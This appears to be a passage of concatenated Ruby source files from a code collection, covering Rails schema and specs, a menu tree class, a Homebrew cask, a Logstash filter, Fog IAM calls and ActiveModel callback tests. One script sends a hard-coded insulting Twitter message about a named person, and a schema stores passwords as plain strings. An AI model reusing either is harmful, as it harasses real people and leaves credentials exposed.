should contain_file('/usr/local/share/ca-certificates/selfsigned.crt') \
.with_ensure('link') \
.with_source('/etc/ssl/certs/jiocloud.com.crt') \
.that_notifies('Exec[update-cacerts]')
should contain_exec('update-cacerts') \
.with_command('update-ca-certificates --fresh') \
.with_refreshonly(true)
end
end
end
| 23.487179 | 78 | 0.611354 |
38ed3531c02042ed59c05c945aa5cf33d8eb1b63 | 999 | # This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# This file is the source Rails uses to define your schema when running `rails
# db:schema:load`. When creating a new database, `rails db:schema:load` tends to
# be faster and is potentially less error prone than running all of your
# migrations from scratch. Old migrations may fail to apply correctly if those
# migrations use external dependencies or application code.
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 2021_02_04_094303) do
create_table "users", force: :cascade do |t|
t.string "username"
t.string "email"
t.string "password"
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
end
end
| 41.625 | 86 | 0.762763 |
f8b4b187312a358a017a335ce81804784921d914 | 159 | # This file is used by Rack-based servers to start the application.
require ::File.expand_path('../config/environment', __FILE__)
run Locations::Application
| 31.8 | 67 | 0.773585 |
79ff442fb6afac978ee8871dfe5deb11309e79f2 | 4,624 | class Menu
class Node
attr_accessor :parent, :parent_id, :children
attr_accessor :site_controller_id, :controller_action_id, :content_page_id
attr_accessor :id, :name, :label, :url
def initialize
@parent = nil
end
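    # Copy identifying attributes from the MenuItem record and precompute this node's URL.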
def setup(item)
@parent_id = item.parent_id
@name = item.name
@id = item.id
@label = item.label
if item.controller_action
@site_controller_id = item.controller_action.controller.id
@controller_action_id = item.controller_action.id
else
@site_controller_id = nil
@controller_action_id = nil
end
@content_page_id = (item.content_page.id if item.content_page)
@url = ''
if item.controller_action
@url = if item.controller_action.url_to_use and
!item.controller_action.url_to_use.empty?
item.controller_action.url_to_use
else
"/#{item.controller_action.controller.name}/#{item.controller_action.name}"
end
else
@url = "/#{item.content_page.name}"
end
end
    def site_controller
      # Memoize the lookup so repeated calls return the cached record.
      @site_controller ||= (SiteController.find(@site_controller_id) if @site_controller_id)
    end
    def controller_action
      @controller_action ||= (ControllerAction.find(@controller_action_id) if @controller_action_id)
    end
    def content_page
      @content_page ||= (ContentPage.find(@content_page_id) if @content_page_id)
    end
def add_child(child)
@children ||= []
@children << child.id
end
end # class Node
attr_accessor :root, :selected
def initialize(role = nil)
@root = Node.new
@by_id = {}
@by_name = {}
@selected = {}
@vector = []
@crumbs = []
items = nil
if role
unless role.cache[:credentials].permission_ids.nil?
items = MenuItem.items_for_permissions(role.cache[:credentials].permission_ids)
end
else # No role given: build menu of everything
items = MenuItem.items_for_permissions
end
if items
unless items.empty?
# Build hashes of items by name and id
for item in items do
# Convert keys to integers (for braindead DB backends)
# item.menu_item_id &&= item.menu_item_id.to_i
# item.menu_item_seq &&= item.menu_item_seq.to_i
# item.menu_item_parent_id &&= item.menu_item_parent_id.to_i
# item.site_controller_id &&= item.site_controller_id.to_i
# item.controller_action_id &&= item.controller_action_id.to_i
# item.content_page_id &&= item.content_page_id.to_i
# item.permission_id &&= item.permission_id.to_i
node = Node.new
node.setup(item)
@by_id[item.id] = node
@by_name[item.name] = node
end
# Then build tree of items
for item in items do
node = @by_id[item.id]
p_id = node.parent_id
if p_id
@by_id[p_id].add_child(node) if @by_id.key?(p_id)
else
@root.add_child(node)
end
end
      end # unless items.empty?
if @root.children and [email protected]?
select(@by_id[@root.children[0]].name)
end
end # if items
end
# Selects the menu item for the given name, if it exists in this
# menu. If not returns nil.
def select(name)
if @by_name.key?(name)
node = @by_name[name]
@selected = {}
@vector = []
@crumbs = []
while node && node.id
@selected[node.id] = node
@vector.unshift node
@crumbs.unshift node.id
node = @by_id[node.parent_id]
end
@vector.unshift @root
return @by_name[name]
end
end
def get_item(item_id)
@by_id[item_id]
end
# Returns the array of items at the given level.
def get_menu(level)
@vector[level].children if @vector.length > level
end
# Returns the name of the currently-selected item
# or nil if no item is selected.
def selected
@vector[@vector.length - 1].name unless @vector.empty?
end
# Returns true if the specified item is selected; false if otherwise.
def selected?(menu_id)
@selected.key?(menu_id) ? true : false
end
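  # Returns the selected menu items from the root down to the current selection (the breadcrumb trail).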
def crumbs
    @crumbs.map { |crumb| get_item(crumb) }
end
end
| 26.574713 | 92 | 0.600562 |
4ad6e19dd0bb1d2d0597c11d4bd434d87d713cbd | 891 | cask 'switchresx' do
version '4.5.2'
sha256 :no_check # required as upstream package is updated in-place
url "http://www.madrau.com/data/switchresx/SwitchResX#{version.to_i}.zip"
name 'SwitchResX'
homepage 'http://www.madrau.com'
license :freemium
prefpane 'SwitchResX.prefPane'
uninstall :quit => [
'fr.madrau.switchresx.app',
'fr.madrau.switchresx.daemon', # note, daemon does not :quit cleanly
],
:signal => [
['INT', 'fr.madrau.switchresx.daemon'],
['KILL', 'fr.madrau.switchresx.daemon'],
],
:delete => [
'/Library/ScriptingAdditions/SwitchResX Extensions.osax',
'/Library/ScriptingAdditions/SwitchResX Menu.osax',
]
end
| 35.64 | 93 | 0.521886 |
f73e2c43a3019f0823a7646d58ea6b3a3c303ed2 | 439 | class PdfValidator < ActiveModel::EachValidator
def validate_each(record, attribute, value)
return unless value.present? && File.exist?(value.path)
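    # Instantiating a reader is enough to verify the file parses as a PDF; the reader itself is not needed afterwards.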
PDF::Reader.new(value.path)
unless value.path.downcase.match?(/\.pdf$/)
record.errors[attribute] << "is a PDF, but has the extension '#{File.extname(value.path)}'"
end
rescue PDF::Reader::MalformedPDFError
record.errors[attribute] << "is not a PDF"
end
end
| 31.357143 | 97 | 0.699317 |
019e881dea79a9c098fae9b0c8b8f3a63c4e55ff | 820 | require 'rubygems'
require 'json'
require 'net/http'
require 'net/https'
require 'uri'
load 'blueprints.rb'
load 'config-oauth.rb'
load 'tls.rb'
class Message
def direct_message(user_id, screen_name, text)
instructions = Blueprints.new
api_url = instructions.getAPI_URL
command_url = instructions.getMessage_URL
    address = URI("#{api_url}#{command_url}")
    # Build the query string with URI.encode_www_form so spaces and punctuation
    # in the message text produce a valid, properly escaped URI.
    params = { text: text }
    params[:screen_name] = screen_name if screen_name
    params[:user_id] = user_id if user_id
    address.query = URI.encode_www_form(params)
request = Net::HTTP::Post.new address.request_uri
    auth_req = TLS.new
    auth_req.connect_req address, request
end
end
new_message = Message.new
new_message.direct_message(nil,"larry_lawal","I dont know how nicki became such a big bitch")
| 25.625 | 94 | 0.696341 |
b96d0c08323b67414872086eff88bfddaca9382a | 2,593 | require 'rails_helper'
require 'fileutils'
# rubocop:disable Metrics/BlockLength
RSpec.feature 'DatasetQueuing', type: :feature do
HOLD_SUBMISSIONS_PATH = File.expand_path(File.join(Rails.root, '..', 'hold-submissions.txt')).freeze
# include MerrittHelper
include DatasetHelper
include Mocks::Datacite
# include Mocks::Repository
include Mocks::SubmissionJob
include Mocks::RSolr
include Mocks::Ror
include Mocks::Stripe
include AjaxHelper
before(:each) do
FileUtils.rm(HOLD_SUBMISSIONS_PATH) if File.exist?(HOLD_SUBMISSIONS_PATH)
# mock_repository!
# for this we don't want to mock the whole repository, but just the actual submission to Merritt that happens in
# the queue, Stash::Merritt::SubmissionJob.do_submit!
mock_submission_job!
mock_solr!
mock_ror!
mock_datacite!
mock_stripe!
@curator = create(:user, role: 'admin', tenant_id: 'dryad')
@author = create(:user, tenant_id: 'dryad', role: 'superuser')
@document_list = []
end
after(:each) do
FileUtils.rm(HOLD_SUBMISSIONS_PATH) if File.exist?(HOLD_SUBMISSIONS_PATH)
end
describe :submitting_quickly do
before(:each, js: true) do
ActionMailer::Base.deliveries = []
# Sign in and create a new dataset
sign_in(@author)
visit root_path
click_link 'My Datasets'
3.times do
start_new_dataset
fill_required_fields
navigate_to_review
check 'agree_to_license'
check 'agree_to_tos'
check 'agree_to_payment'
click_button 'submit_dataset'
end
@resource = StashEngine::Resource.where(user: @author).last
end
it 'should show queuing', js: true do
visit '/stash/submission_queue'
wait_for_ajax(15)
expect(page).to have_content(/[01] are currently processing from this server/)
expect(page).to have_content(/[23] queued on this server/)
end
it 'should pause transfers', js: true do
visit '/stash/submission_queue'
click_button 'graceful_shutdown'
click_link 'go back to viewing queue updates'
wait_for_ajax(15)
expect(page).to have_text('Submissions are being held for shutdown on this server')
end
it 'should re-enable transfers', js: true do
FileUtils.touch(HOLD_SUBMISSIONS_PATH)
visit '/stash/submission_queue'
click_button 'graceful_start'
click_link 'go back to viewing queue updates'
wait_for_ajax(15)
expect(page).to have_text('Normal submissions in effect on this server')
end
end
end
# rubocop:enable Metrics/BlockLength
| 30.869048 | 116 | 0.699961 |
1cc0d1536ae3c5351fd2f3d48858d7d64b81a479 | 3,467 | # frozen_string_literal: true
require 'simplecov'
require 'simplecov-json'
SimpleCov.formatters = [
SimpleCov::Formatter::HTMLFormatter
]
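# Fail the test run if overall coverage drops below this percentage (enforced in the at_exit hook below).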
MINIMUM_COVERAGE = 27
SimpleCov.at_exit do
if SimpleCov.result.covered_percent < MINIMUM_COVERAGE
abort "Too low coverage. Expected #{MINIMUM_COVERAGE} was #{SimpleCov.result.covered_percent}"
end
SimpleCov.result.format!
end
SimpleCov.start 'rails' do
add_filter 'vendor'
end
# This file is copied to spec/ when you run 'rails generate rspec:install'
require 'spec_helper'
ENV['RAILS_ENV'] ||= 'test'
require File.expand_path('../config/environment', __dir__)
require 'action_cable/testing/rspec'
# Prevent database truncation if the environment is production
abort('The Rails environment is running in production mode!') if Rails.env.production?
require 'rspec/rails'
# Add additional requires below this line. Rails is not loaded until this point!
# Requires supporting ruby files with custom matchers and macros, etc, in
# spec/support/ and its subdirectories. Files matching `spec/**/*_spec.rb` are
# run as spec files by default. This means that files in spec/support that end
# in _spec.rb will both be required and run as specs, causing the specs to be
# run twice. It is recommended that you do not name files matching this glob to
# end with _spec.rb. You can configure this pattern with the --pattern
# option on the command line or in ~/.rspec, .rspec or `.rspec-local`.
#
# The following line is provided for convenience purposes. It has the downside
# of increasing the boot-up time by auto-requiring all files in the support
# directory. Alternatively, in the individual `*_spec.rb` files, manually
# require only the support files necessary.
#
# Dir[Rails.root.join('spec', 'support', '**', '*.rb')].each { |f| require f }
# Checks for pending migrations and applies them before tests are run.
# If you are not using ActiveRecord, you can remove these lines.
begin
ActiveRecord::Migration.maintain_test_schema!
rescue ActiveRecord::PendingMigrationError => error
puts error.to_s.strip
exit 1
end
RSpec.configure do |config|
# Remove this line if you're not using ActiveRecord or ActiveRecord fixtures
config.fixture_path = "#{::Rails.root}/spec/fixtures"
# If you're not using ActiveRecord, or you'd prefer not to run each of your
# examples within a transaction, remove the following line or assign false
# instead of true.
config.use_transactional_fixtures = true
# RSpec Rails can automatically mix in different behaviours to your tests
# based on their file location, for example enabling you to call `get` and
# `post` in specs under `spec/controllers`.
#
# You can disable this behaviour by removing the line below, and instead
# explicitly tag your specs with their type, e.g.:
#
# RSpec.describe UsersController, :type => :controller do
# # ...
# end
#
# The different available types are documented in the features, such as in
# https://relishapp.com/rspec/rspec-rails/docs
config.infer_spec_type_from_file_location!
# Filter lines from Rails gems in backtraces.
config.filter_rails_from_backtrace!
# arbitrary gems may also be filtered via:
# config.filter_gems_from_backtrace("gem name")
config.include FactoryBot::Syntax::Methods
config.include Devise::Test::ControllerHelpers, type: :controller
config.before(:each, altering_database: true) do
DatabaseCleaner.strategy = :truncation
end
end
| 36.882979 | 98 | 0.75512 |
1ab4f413fa2b76c2a6926001336bd6525a8320a4 | 127 | covers 'facets/file/null'
test_case File do
class_method :null do
test do
assert File.null
end
end
end
| 8.466667 | 25 | 0.645669 |
61201cb724fe5250869151c66c213b9db4252287 | 880 | module Dashing
module Generators
class InstallGenerator < ::Rails::Generators::Base
source_root File.expand_path('../../templates', __FILE__)
desc 'Creates a Dashing initializer for your application.'
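      # Mount the engine in the host application's routes at the configured path.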
def install
route 'mount Dashing::Engine, at: Dashing.config.engine_path'
end
def copy_initializer
template 'initializer.rb', 'config/initializers/dashing.rb'
end
def copy_dashboard
template 'dashboards/sample.html.erb', 'app/views/dashing/dashboards/sample.html.erb'
end
def copy_widget_manifests
template 'widgets/index.css', 'app/assets/stylesheets/dashing/widgets/index.css'
template 'widgets/index.js', 'app/assets/javascripts/dashing/widgets/index.js'
end
def copy_job
template 'jobs/sample.rb', 'app/jobs/sample.rb'
end
end
end
end
| 26.666667 | 93 | 0.675 |
f87660d7a21d296efca7258519ebe668882427ba | 2,861 | CurationConcerns.configure do |config|
# Injected via `rails g geo_concerns:install`
config.register_curation_concern :vector_work
config.register_curation_concern :raster_work
config.register_curation_concern :image_work
config.minter_statefile = "log/minter-state"
# Should schema.org microdata be displayed?
# config.display_microdata = true
# What default microdata type should be used if a more appropriate
# type can not be found in the locale file?
# config.microdata_default_type = 'http://schema.org/CreativeWork'
# How frequently should a file be audited.
# Note: In CurationConcerns you must trigger the FileSetAuditService manually.
# config.max_days_between_audits = 7
# Enable displaying usage statistics in the UI
# Requires a Google Analytics id and OAuth2 keyfile. See README for more info
# config.analytics = false
# Specify a date you wish to start collecting Google Analytic statistics for.
# config.analytic_start_date = DateTime.new(2014,9,10)
# Where to store tempfiles, leave blank for the system temp directory (e.g. /tmp)
config.temp_file_base = File.join(Rails.root, 'tmp')
# Location on local file system where derivatives will be stored.
# If you use a multi-server architecture, this MUST be a shared volume.
config.derivatives_path = File.join(Rails.root, 'tmp', 'derivatives')
# Location on local file system where uploaded files will be staged
# prior to being ingested into the repository or having derivatives generated.
# If you use a multi-server architecture, this MUST be a shared volume.
config.working_path = File.join(Rails.root, 'tmp', 'uploads')
# If you have ffmpeg installed and want to transcode audio and video uncomment this line
# config.enable_ffmpeg = true
# CurationConcerns uses NOIDs for files and collections instead of Fedora UUIDs
# where NOID = 10-character string and UUID = 32-character string w/ hyphens
# config.enable_noids = true
# Specify a different template for your repository's NOID IDs
# config.noid_template = ".reeddeeddk"
# Store identifier minter's state in a file for later replayability
# If you use a multi-server architecture, this MUST be on a shared volume.
# config.minter_statefile = '/tmp/minter-state'
# Specify whether the media display partial should render a download link
# config.display_media_download_link = true
# Specify the path to the file characterization tool:
# config.fits_path = "fits.sh"
# Specify a date you wish to start collecting Google Analytic statistics for.
# Leaving it blank will set the start date to when ever the file was uploaded by
# NOTE: if you have always sent analytics to GA for downloads and page views leave this commented out
# config.analytic_start_date = DateTime.new(2014,9,10)
end
Date::DATE_FORMATS[:standard] = '%m/%d/%Y'
| 44.015385 | 103 | 0.761622 |
4ae94c028bd0ee647e0cc3f8420c758a46a73c04 | 159 | dir = File.dirname(__FILE__)
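# Require (and print) every test_*.rb file found in this directory.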
Dir[File.expand_path("#{dir}/*.rb")].uniq.each do |file|
if file =~ /\/test_\w+\.rb$/
puts file
require file
end
end | 22.714286 | 56 | 0.616352 |
4aa56a65a679a192fd7c566e0e7976f7d8cbb043 | 1,047 | # encoding: utf-8
require "logstash/filters/base"
require "logstash/namespace"
# Execute ruby code.
#
# For example, to cancel 90% of events, you can do this:
# [source,ruby]
# filter {
# ruby {
# # Cancel 90% of events
# code => "event.cancel if rand <= 0.90"
# }
# }
#
class LogStash::Filters::Ruby < LogStash::Filters::Base
config_name "ruby"
# Any code to execute at logstash startup-time
config :init, :validate => :string
# The code to execute for every event.
# You will have an `event` variable available that is the event itself.
config :code, :validate => :string, :required => true
public
def register
# TODO(sissel): Compile the ruby code
eval(@init, binding, "(ruby filter init)") if @init
eval("@codeblock = lambda { |event| #{@code} }", binding, "(ruby filter code)")
end # def register
public
def filter(event)
return unless filter?(event)
@codeblock.call(event)
filter_matched(event)
end # def filter
end # class LogStash::Filters::Ruby
| 24.928571 | 83 | 0.647564 |
b9d85a235d075bb5df36b081b24b570099e2538d | 1,194 | # frozen_string_literal: true
require_relative 'helper'
class TestFakerFoodPL < Test::Unit::TestCase
include DeterministicHelper
assert_methods_are_deterministic(
FFaker::FoodPL,
:food, :processed, :unprocessed, :vegetable, :fruit,
:meat, :herb, :spice, :fermented, :diary, :preserves
)
def setup
@tester = FFaker::FoodPL
end
def test_food
assert_match(/\w+/, @tester.food)
end
def test_processed
assert_match(/\w+/, @tester.processed)
end
def test_unprocessed
assert_match(/\w+/, @tester.unprocessed)
end
def test_vegetable
assert_include(@tester::VEGETABLES, @tester.vegetable)
end
def test_fruit
assert_include(@tester::FRUITS, @tester.fruit)
end
def test_herb
assert_include(@tester::HERBS, @tester.herb)
end
def test_spice
assert_include(@tester::SPICES, @tester.spice)
end
def test_meat
assert_include(@tester::MEATS, @tester.meat)
end
def test_fermented
assert_include(@tester::FERMENTED, @tester.fermented)
end
def test_diary
assert_include(@tester::DIARY, @tester.diary)
end
def test_preserves
assert_include(@tester::PRESERVES, @tester.preserves)
end
end
| 19.258065 | 58 | 0.710218 |
267e7bbc249e303efcd3238f76b3b60caccb2fc7 | 2,098 | module QA
module Page
module Project
class Show < Page::Base
include Page::Component::ClonePanel
view 'app/views/projects/_last_push.html.haml' do
element :create_merge_request
end
view 'app/views/projects/_home_panel.html.haml' do
element :project_name
end
view 'app/views/layouts/header/_new_dropdown.haml' do
element :new_menu_toggle
element :new_issue_link, "link_to _('New issue'), new_project_issue_path(@project)"
end
view 'app/views/shared/_ref_switcher.html.haml' do
element :branches_select
element :branches_dropdown
end
view 'app/views/projects/buttons/_fork.html.haml' do
element :fork_label, "%span= s_('ProjectOverview|Fork')"
element :fork_link, "link_to new_project_fork_path(@project)"
end
view 'app/views/projects/_files.html.haml' do
element :tree_holder, '.tree-holder'
end
view 'app/presenters/project_presenter.rb' do
element :new_file_button, "_('New file'),"
end
def project_name
find('.qa-project-name').text
end
def go_to_new_file!
click_on 'New file'
end
def switch_to_branch(branch_name)
find_element(:branches_select).click
within_element(:branches_dropdown) do
click_on branch_name
end
end
def last_commit_content
find_element(:commit_content).text
end
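        # Waits for the "Create merge request" button to appear, then clicks it.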
def new_merge_request
wait(reload: true) do
has_css?(element_selector_css(:create_merge_request))
end
click_element :create_merge_request
end
def wait_for_import
wait(reload: true) do
has_css?('.tree-holder')
end
end
def go_to_new_issue
click_element :new_menu_toggle
click_link 'New issue'
end
def fork_project
click_on 'Fork'
end
end
end
end
end
| 24.682353 | 93 | 0.595329 |
1c616507234829f0c5e971aeb54fb188dfc7864f | 1,981 | # Licensed to Elasticsearch B.V. under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Elasticsearch B.V. licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
module Elasticsearch
module API
module Cat
module Actions
module ParamsRegistry
extend self
# A Mapping of all the actions to their list of valid params.
#
# @since 6.1.1
PARAMS = {}
# Register an action with its list of valid params.
#
# @example Register the action.
# ParamsRegistry.register(:benchmark, [ :verbose ])
#
# @param [ Symbol ] action The action to register.
# @param [ Array[Symbol] ] valid_params The list of valid params.
#
# @since 6.1.1
def register(action, valid_params)
PARAMS[action.to_sym] = valid_params
end
# Get the list of valid params for a given action.
#
# @example Get the list of valid params.
# ParamsRegistry.get(:benchmark)
#
# @param [ Symbol ] action The action.
#
# @return [ Array<Symbol> ] The list of valid params for the action.
#
# @since 6.1.1
def get(action)
PARAMS.fetch(action, [])
end
end
end
end
end
end
| 32.47541 | 78 | 0.61686 |
d5d401e45fa90d3cc5e7a11f6eef1d463ab08326 | 147 | append_file '.gitignore', <<-ignores
.ackrc
.rvmrc
config/database.yml
.bundle
db/*.sqlite3
log/*.log
tmp/
.sass-cache/
*.DS_Store
ignores
| 10.5 | 36 | 0.727891 |
ac647725cb6feef7aaf578c44aba4292f7baee28 | 1,521 | # encoding: utf-8
# copyright: 2015, Vulcano Security GmbH
require 'utils/simpleconfig'
module Inspec::Resources
class NtpConf < Inspec.resource(1)
name 'ntp_conf'
supports platform: 'unix'
desc 'Use the ntp_conf InSpec audit resource to test the synchronization settings defined in the ntp.conf file. This file is typically located at /etc/ntp.conf.'
example "
describe ntp_conf do
its('server') { should_not eq nil }
its('restrict') { should include '-4 default kod notrap nomodify nopeer noquery'}
end
"
def initialize(path = nil)
@conf_path = path || '/etc/ntp.conf'
end
def method_missing(name)
param = read_params[name.to_s]
# extract first value if we have only one value in array
return param[0] if param.is_a?(Array) and param.length == 1
param
end
def to_s
'ntp.conf'
end
private
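    # Parse the configuration file into a params hash, skipping the resource when the file is missing or unreadable.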
def read_params
return @params if defined?(@params)
if !inspec.file(@conf_path).file?
skip_resource "Can't find file \"#{@conf_path}\""
return @params = {}
end
content = inspec.file(@conf_path).content
if content.empty? && !inspec.file(@conf_path).empty?
skip_resource "Can't read file \"#{@conf_path}\""
return @params = {}
end
# parse the file
conf = SimpleConfig.new(
content,
assignment_regex: /^\s*(\S+)\s+(.*)\s*$/,
multiple_values: true,
)
@params = conf.params
end
end
end
| 25.779661 | 165 | 0.617357 |
3832eb315f84f8fff8c50e8fe0d7a668ad580152 | 575 | FactoryBot.define do
factory :staff_member do
email { Faker::Internet.email }
family_name { Faker::Japanese::Name.last_name }
given_name { Faker::Japanese::Name.first_name }
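    # Derive the kana readings from the kanji names generated above when they are present.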
family_name_kana { family_name ? family_name.yomi : Faker::Japanese::Name.last_name.yomi }
given_name_kana { given_name ? given_name.yomi : Faker::Japanese::Name.first_name.yomi }
password { Faker::Internet.password }
start_date { Time.zone.yesterday }
end_date { Time.zone.tomorrow }
suspended false
end
end
| 41.071429 | 94 | 0.657391 |
267161d96de20a0a6e531aaccd6559cffba6e697 | 2,007 | module Fog
module AWS
class IAM
class Real
require 'fog/aws/parsers/iam/list_server_certificates'
# List server certificates
#
# ==== Parameters
# * options<~Hash>:
# * 'Marker'<~String> - The marker from the previous result (for pagination)
# * 'MaxItems'<~String> - The maximum number of server certificates you want in the response
# * 'PathPrefix'<~String> - The path prefix for filtering the results
#
# ==== Returns
# * response<~Excon::Response>:
# * body<~Hash>:
# * 'Certificates'<~Array> - Matching server certificates
# * server_certificate<~Hash>:
# * Arn<~String> -
# * Path<~String> -
# * ServerCertificateId<~String> -
# * ServerCertificateName<~String> -
# * UploadDate<~Time> -
# * 'IsTruncated'<~Boolean> - Whether or not the results were truncated
# * 'Marker'<~String> - appears when IsTruncated is true as the next marker to use
#
# ==== See Also
# http://docs.amazonwebservices.com/IAM/latest/APIReference/index.html?API_ListServerCertificates.html
#
def list_server_certificates(options = {})
request({
'Action' => 'ListServerCertificates',
:parser => Fog::Parsers::AWS::IAM::ListServerCertificates.new
}.merge!(options))
end
end
class Mock
def list_server_certificates(options = {})
certificates = self.data[:server_certificates].values
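          # Honour the optional PathPrefix filter, mirroring the behaviour of the real API.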
certificates = certificates.select { |certificate| certificate['Path'] =~ Regexp.new("^#{options['PathPrefix']}") } if options['PathPrefix']
response = Excon::Response.new
response.status = 200
response.body = {
'Certificates' => certificates
}
response
end
end
end
end
end
| 35.210526 | 150 | 0.55705 |
873d8e1f0e338e9282346a73db0c93bda0b10716 | 2,930 | require 'helper'
##
# Test class
class TestLoadFile < Test::Unit::TestCase
# Path to test files
TMP_STRING_PATH = 'test/files/tmp.strings.dat'
STRING_PATH = 'test/files/strings.dat'
# Called before every test method runs. Can be used
# to set up fixture information.
def setup
@storage = Storage::Trie.new
end
##
# Check if methods exist
def test_respond_to
assert_respond_to @storage, :load_from_file
assert_respond_to @storage, :save_to_file
end
##
#
def test_load_from_file_path
@storage.load_from_file(STRING_PATH)
assert_equal ['php'], @storage.find('php')
assert @storage.contains?('php')
assert_equal ['Pascal'], @storage.find('Pascal')
assert @storage.contains?('Pascal')
assert_equal %w(php mathematica occam oxygene pascal seed7).sort, @storage.to_a.sort
end
##
#
def test_load_from_file_object
@storage.load_from_file(File.new(STRING_PATH, 'r'))
assert_equal ['php'], @storage.find('php')
assert @storage.contains?('php')
assert_equal ['Pascal'], @storage.find('Pascal')
assert @storage.contains?('Pascal')
assert_equal %w(php mathematica occam oxygene pascal seed7).sort, @storage.to_a.sort
end
##
#
def test_save_to_file_path
@storage.add('java')
@storage.add('java script')
@storage.add('perl')
@storage.add('rust')
@storage.add('Smalltalk')
@storage.add('Scheme')
@storage.save_to_file(TMP_STRING_PATH)
test_write = Storage::Trie.new
test_write.load_from_file(TMP_STRING_PATH)
assert_equal ['java', 'java script', 'perl', 'rust', 'smalltalk', 'scheme'].sort, test_write.to_a.sort
# Test for append load
test_write.load_from_file(STRING_PATH)
assert_equal ['java', 'java script', 'perl', 'rust', 'smalltalk', 'scheme', 'php', 'mathematica', 'occam', 'oxygene', 'pascal', 'seed7'].sort, test_write.to_a.sort
end
##
#
def test_save_to_file_object
@storage.add('java')
@storage.add('java script')
@storage.add('perl')
@storage.add('rust')
@storage.add('Smalltalk')
@storage.add('Scheme')
@storage.save_to_file(File.new(TMP_STRING_PATH, 'w'))
test_write = Storage::Trie.new
test_write.load_from_file(TMP_STRING_PATH)
assert_equal ['java', 'java script', 'perl', 'rust', 'smalltalk', 'scheme'].sort, test_write.to_a.sort
# Test for append load
test_write.load_from_file(STRING_PATH)
assert_equal ['java', 'java script', 'perl', 'rust', 'smalltalk', 'scheme', 'php', 'mathematica', 'occam', 'oxygene', 'pascal', 'seed7'].sort, test_write.to_a.sort
end
# Called after every test method runs. Can be used to tear
# down fixture information.
def teardown
# Delete file
File.delete(TMP_STRING_PATH) if File.exist?(TMP_STRING_PATH)
end
end | 25.478261 | 168 | 0.652218 |
3311a6bbfc18fc6346b4138abd082058ca34e3aa | 6,629 | require "cases/helper"
class Dog
include ActiveModel::Validations
include ActiveModel::Validations::Callbacks
attr_accessor :name, :history
def initialize
@history = []
end
end
class DogWithMethodCallbacks < Dog
before_validation :set_before_validation_marker
after_validation :set_after_validation_marker
def set_before_validation_marker; history << "before_validation_marker"; end
def set_after_validation_marker; history << "after_validation_marker" ; end
end
class DogValidatorsAreProc < Dog
before_validation { history << "before_validation_marker" }
after_validation { history << "after_validation_marker" }
end
class DogWithTwoValidators < Dog
before_validation { history << "before_validation_marker1" }
before_validation { history << "before_validation_marker2" }
end
class DogBeforeValidatorReturningFalse < Dog
before_validation { false }
before_validation { history << "before_validation_marker2" }
end
class DogBeforeValidatorThrowingAbort < Dog
before_validation { throw :abort }
before_validation { history << "before_validation_marker2" }
end
class DogAfterValidatorReturningFalse < Dog
after_validation { false }
after_validation { history << "after_validation_marker" }
end
class DogWithMissingName < Dog
before_validation { history << "before_validation_marker" }
validates_presence_of :name
end
class DogValidatorWithOnCondition < Dog
before_validation :set_before_validation_marker, on: :create
after_validation :set_after_validation_marker, on: :create
def set_before_validation_marker; history << "before_validation_marker"; end
def set_after_validation_marker; history << "after_validation_marker" ; end
end
class DogValidatorWithOnMultipleCondition < Dog
before_validation :set_before_validation_marker_on_context_a, on: :context_a
before_validation :set_before_validation_marker_on_context_b, on: :context_b
after_validation :set_after_validation_marker_on_context_a, on: :context_a
after_validation :set_after_validation_marker_on_context_b, on: :context_b
def set_before_validation_marker_on_context_a; history << "before_validation_marker on context_a"; end
def set_before_validation_marker_on_context_b; history << "before_validation_marker on context_b"; end
def set_after_validation_marker_on_context_a; history << "after_validation_marker on context_a" ; end
def set_after_validation_marker_on_context_b; history << "after_validation_marker on context_b" ; end
end
class DogValidatorWithIfCondition < Dog
before_validation :set_before_validation_marker1, if: -> { true }
before_validation :set_before_validation_marker2, if: -> { false }
after_validation :set_after_validation_marker1, if: -> { true }
after_validation :set_after_validation_marker2, if: -> { false }
def set_before_validation_marker1; history << "before_validation_marker1"; end
def set_before_validation_marker2; history << "before_validation_marker2" ; end
def set_after_validation_marker1; history << "after_validation_marker1"; end
def set_after_validation_marker2; history << "after_validation_marker2" ; end
end
class CallbacksWithMethodNamesShouldBeCalled < ActiveModel::TestCase
def test_if_condition_is_respected_for_before_validation
d = DogValidatorWithIfCondition.new
d.valid?
assert_equal ["before_validation_marker1", "after_validation_marker1"], d.history
end
def test_on_condition_is_respected_for_validation_with_matching_context
d = DogValidatorWithOnCondition.new
d.valid?(:create)
assert_equal ["before_validation_marker", "after_validation_marker"], d.history
end
def test_on_condition_is_respected_for_validation_without_matching_context
d = DogValidatorWithOnCondition.new
d.valid?(:save)
assert_equal [], d.history
end
def test_on_condition_is_respected_for_validation_without_context
d = DogValidatorWithOnCondition.new
d.valid?
assert_equal [], d.history
end
def test_on_multiple_condition_is_respected_for_validation_with_matching_context
d = DogValidatorWithOnMultipleCondition.new
d.valid?(:context_a)
assert_equal ["before_validation_marker on context_a", "after_validation_marker on context_a"], d.history
d = DogValidatorWithOnMultipleCondition.new
d.valid?(:context_b)
assert_equal ["before_validation_marker on context_b", "after_validation_marker on context_b"], d.history
d = DogValidatorWithOnMultipleCondition.new
d.valid?([:context_a, :context_b])
assert_equal([
"before_validation_marker on context_a",
"before_validation_marker on context_b",
"after_validation_marker on context_a",
"after_validation_marker on context_b"
], d.history)
end
def test_on_multiple_condition_is_respected_for_validation_without_matching_context
d = DogValidatorWithOnMultipleCondition.new
d.valid?(:save)
assert_equal [], d.history
end
def test_on_multiple_condition_is_respected_for_validation_without_context
d = DogValidatorWithOnMultipleCondition.new
d.valid?
assert_equal [], d.history
end
def test_before_validation_and_after_validation_callbacks_should_be_called
d = DogWithMethodCallbacks.new
d.valid?
assert_equal ["before_validation_marker", "after_validation_marker"], d.history
end
def test_before_validation_and_after_validation_callbacks_should_be_called_with_proc
d = DogValidatorsAreProc.new
d.valid?
assert_equal ["before_validation_marker", "after_validation_marker"], d.history
end
